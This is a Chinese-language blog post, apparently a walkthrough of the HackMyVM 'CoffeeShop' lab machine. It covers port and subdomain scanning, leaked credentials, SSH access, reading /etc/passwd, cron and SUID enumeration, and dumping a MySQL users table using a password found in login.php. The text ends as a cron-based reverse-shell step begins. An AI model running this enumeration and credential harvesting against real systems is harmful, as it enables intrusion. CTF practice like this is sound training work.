{"id":481,"date":"2024-04-01T13:26:12","date_gmt":"2024-04-01T05:26:12","guid":{"rendered":"http:\/\/162.14.82.114\/?p=481"},"modified":"2024-04-01T13:26:12","modified_gmt":"2024-04-01T05:26:12","slug":"hmv-_-coffeeshop","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/481\/04\/01\/2024\/","title":{"rendered":"hmv[-_-]CoffeeShop"},"content":{"rendered":"<h1>CoffeeShop<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325634.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325634.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401123115997\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325636.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325636.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401123319738\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">sudo nmap -sS -p 1-65535 10.0.2.15\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-01 00:34 EDT\nNmap scan report for 10.0.2.15\nHost is up (0.000079s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u5f00\u542f\u4e8680\u7aef\u53e3\uff0c\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/10.0.2.15\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n<pre><code class=\"language-text\">\/.php                 (Status: 403) [Size: 274]\n\/.html.png            (Status: 403) [Size: 274]\n\/shop                 (Status: 301) [Size: 305] [--&gt; http:\/\/10.0.2.15\/shop\/]\n\/.html.png            (Status: 403) [Size: 274]\n\/.php                 (Status: 403) [Size: 274]\n\/server-status        (Status: 403) [Size: 274]<\/code><\/pre>\n<p>注意：上面 <code>-x<\/code> 的参数里 <code>html.png<\/code> 少了一个逗号，应为 <code>html,png<\/code>。gobuster 按逗号拆分扩展名，于是把 <code>html.png<\/code> 当成了一个扩展名，结果里才会出现 <code>\/.html.png<\/code>，而真正的 <code>.html<\/code> 和 <code>.png<\/code> 文件其实一个都没有扫到。<\/p>\n<p>\u4ee5\u9632\u4e07\u4e00\uff0c\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/10.0.2.15<\/code><\/pre>\n<pre><code class=\"language-text\">[00:38:32] 403 -  274B  - \/.ht_wsr.txt\n[00:38:32] 403 -  274B  - \/.htaccess.orig\n[00:38:32] 403 -  274B  - \/.htaccess.sample\n[00:38:32] 403 -  274B  - \/.htaccess_orig\n[00:38:32] 403 -  274B  - \/.htaccess_extra\n[00:38:32] 403 -  274B  - \/.htaccess_sc\n[00:38:32] 403 -  274B  - \/.htaccess.save\n[00:38:32] 403 -  274B  - \/.htaccessOLD2\n[00:38:32] 403 -  274B  - \/.htaccessOLD\n[00:38:32] 403 -  274B  - \/.htm\n[00:38:32] 403 -  274B  - \/.htaccess.bak1\n[00:38:32] 403 -  274B  - \/.htaccessBAK\n[00:38:32] 403 -  274B  - \/.html\n[00:38:32] 403 -  274B  - \/.htpasswds\n[00:38:32] 403 -  274B  - 
\/.htpasswd_test\n[00:38:32] 403 -  274B  - \/.httr-oauth\n[00:38:33] 403 -  274B  - \/.php\n[00:38:57] 403 -  274B  - \/server-status\n[00:38:57] 403 -  274B  - \/server-status\/\n[00:38:58] 301 -  305B  - \/shop  -&gt;  http:\/\/10.0.2.15\/shop\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u52d8\u5bdf\u4e00\u4e0b<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325638.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325638.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401124015785\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6e90\u7801\u91cc\u4e5f\u6ca1\u5565\uff0c\u63d2\u4ef6\u663e\u793a\u4e86\u4e00\u4e9b\u914d\u7f6e\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325639.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325639.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401124110200\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325640.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325640.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401124143710\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u767b\u5f55\u7684\u5730\u65b9\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325641.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325641.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401124203592\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5f31\u53e3\u4ee4\u3001\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u65e0\u679c\uff0c\u518d\u7ffb\u7ffb\uff1a<\/p>\n<p>\u5c1d\u8bd5\u5c06host\u6dfb\u52a0\u8fdb\u53bb\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u5230\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;10.0.2.15 
midnight.coffee&#039; &gt;&gt; \/etc\/hosts<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325642.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325642.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401124831108\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>ok\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u4e4b\u524d\u770b\u5230\u7684\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\/.htpasswds\n\/.htpasswd_test\nYou don&#039;t have permission to access this resource.<\/code><\/pre>\n<p>\u5c1d\u8bd5FUZZ\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">wfuzz -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt  -u midnight.coffee  -H &quot;Host: FUZZ.midnight.coffee&quot;  --hh 1690 2&gt;\/dev\/null<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325643.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325643.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401125523410\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6dfb\u52a0dns\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-bash\">10.0.2.15 midnight.coffee dev.midnight.coffee<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325644.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325644.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401125722241\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u7ed9\u51fa\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">developer\ndeveloper<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325645.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325645.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401125815772\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">tuna : 1L0v3_TuN4_Very_Much<\/code><\/pre>\n<h3>ssh\u8fde\u63a5<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325646.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325646.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401125939986\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">tuna@coffee-shop:~$ sudo -l\n[sudo] password for tuna: \nSorry, user tuna may not run sudo on coffee-shop.\ntuna@coffee-shop:~$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux 
daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nmrmidnight:x:1000:1000:mrmidnight:\/home\/mrmidnight:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nshopadmin:x:1001:1001:,,,:\/home\/shopadmin:\/bin\/bash\nmysql:x:114:120:MySQL Server,,,:\/nonexistent:\/bin\/false\ntuna:x:1002:1002:,,,:\/home\/tuna:\/bin\/bash\ntuna@coffee-shop:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n* * * * * \/bin\/bash \/home\/shopadmin\/execute.sh\n\ncat: \/etc\/cron.weekly: Is a directory\ntuna@coffee-shop:~$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/snap\/snapd\/21184\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/2105\/usr\/bin\/chfn\n\/snap\/core20\/2105\/usr\/bin\/chsh\n\/snap\/core20\/2105\/usr\/bin\/gpasswd\n\/snap\/core20\/2105\/usr\/bin\/mount\n\/snap\/core20\/2105\/usr\/bin\/newgrp\n\/snap\/core20\/2105\/usr\/bin\/passwd\n\/snap\/core20\/2105\/usr\/bin\/su\n\/snap\/core20\/2105\/usr\/bin\/sudo\n\/snap\/core20\/2105\/usr\/bin\/umount\n\/snap\/core20\/2105\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2105\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/libexec\/polkit-agent-helper-1\ntuna@coffee-shop:~$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\ntuna@coffee-shop:~$ pwd\n\/home\/tuna\ntuna@coffee-shop:~$ ls -la\ntotal 40\ndrwxr-x--- 3 tuna tuna 4096 Jan  3 18:49 .\ndrwxr-xr-x 5 root root 4096 Jan  3 17:12 ..\n-rw------- 1 tuna tuna  839 Jan  3 18:40 .bash_history\n-rw-r--r-- 1 tuna tuna  220 Jan  3 17:12 .bash_logout\n-rw-r--r-- 1 tuna tuna 3771 Jan  3 17:12 .bashrc\ndrwx------ 2 tuna tuna 4096 Jan  3 18:49 .cache\n-rw-r--r-- 1 tuna tuna  807 Jan  
3 17:12 .profile\n-rw------- 1 tuna tuna 8410 Jan  3 18:28 .viminfo\ntuna@coffee-shop:~$ head .bash_history \nls\ntouch coffee_list.txt\nvim coffee_list.txt \nhead coffee_list.txt \nvim coffee_list.txt \nmv coffee_list.txt unavailable.txt\nls\nhead unavailable.txt \ntail unavailable.txt \nmv unavailable.txt available.txt\ntuna@coffee-shop:~$ tail .bash_history \nls\ncat \/home\/shopadmin\/\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\ncd\nls\nexit\ntuna@coffee-shop:~$ cd \/var\/www\/html\ntuna@coffee-shop:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 4 root root 4096 Jan  3 16:51 .\ndrwxr-xr-x 3 root root 4096 Jan  3 14:10 ..\n-rw-r--r-- 1 root root 1690 Jan  3 16:51 index.html\ndrwxr-xr-x 3 root root 4096 Jan  3 18:49 shop\ndrwxr-xr-x 3 root root 4096 Jan  3 16:34 subdomaindeveloperdirectoryuwu\ntuna@coffee-shop:\/var\/www\/html$ cd shop\ntuna@coffee-shop:\/var\/www\/html\/shop$ ls -la\ntotal 24\ndrwxr-xr-x 3 root root 4096 Jan  3 18:49 .\ndrwxr-xr-x 4 root root 4096 Jan  3 16:51 ..\n-rw-r--r-- 1 root root 1754 Jan  3 18:49 dashboard.php\n-rw-r--r-- 1 root root 2577 Jan  3 16:47 index.html\n-rw-r--r-- 1 root root 2970 Jan  3 17:02 login.php\ndrwxr-xr-x 2 root root 4096 Jan  3 16:46 stylesheet\ntuna@coffee-shop:\/var\/www\/html\/shop$ cat login.php\n&lt;?php\nini_set(&#039;display_errors&#039;, 1);\nini_set(&#039;display_startup_errors&#039;, 1);\nerror_reporting(E_ALL);\n\nsession_start();\n\n$host = &#039;localhost&#039;;\n$username = &#039;shopadmin&#039;;\n$password = &#039;1_4m_4dmin&#039;;\n$database = &#039;midnightcoffee&#039;;<\/code><\/pre>\n<h3>mysql\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237<\/p>\n<pre><code class=\"language-apl\">su shopadmin\n1_4m_4dmin\n# su: Authentication failure<\/code><\/pre>\n<p>mysql\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">mysql -u shopadmin -p<\/code><\/pre>\n<pre><code 
class=\"language-c\">mysql&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| midnightcoffee     |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.00 sec)\n\nmysql&gt; use midnightcoffee;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; show tables;\n+--------------------------+\n| Tables_in_midnightcoffee |\n+--------------------------+\n| users                    |\n+--------------------------+\n1 row in set (0.00 sec)\n\nmysql&gt; select * from users;\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n| id | username  | password                                                     | auth_token                       |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n|  1 | shopadmin | $2a$12$yqH60OJyTqoPHXe1g1cGDu93me1v.wGcEEZV5rLy39stUJO.Xsjwi | NULL                             |\n|  2 | tuna      | 1L0v3_TuN4_Very_Much                                         | NULL                             |\n|  3 | developer | developer                                                    | 5b290480bcbaec662aa8531cbc6da4fc |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n3 rows in set (0.00 sec)<\/code><\/pre>\n<p>\u6211\u64e6\uff0c\u6ca1\u5565\u7528\u3002\u3002\u3002<\/p>\n<h3>\u5b9a\u65f6\u4efb\u52a1+\u53cd\u5f39shell<\/h3>\n<p>\u5b9a\u65f6\u4efb\u52a1\u626b\u5230\u4e00\u4e2a\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-apl\">\/home\/shopadmin\/execute.sh<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\n\/bin\/bash 
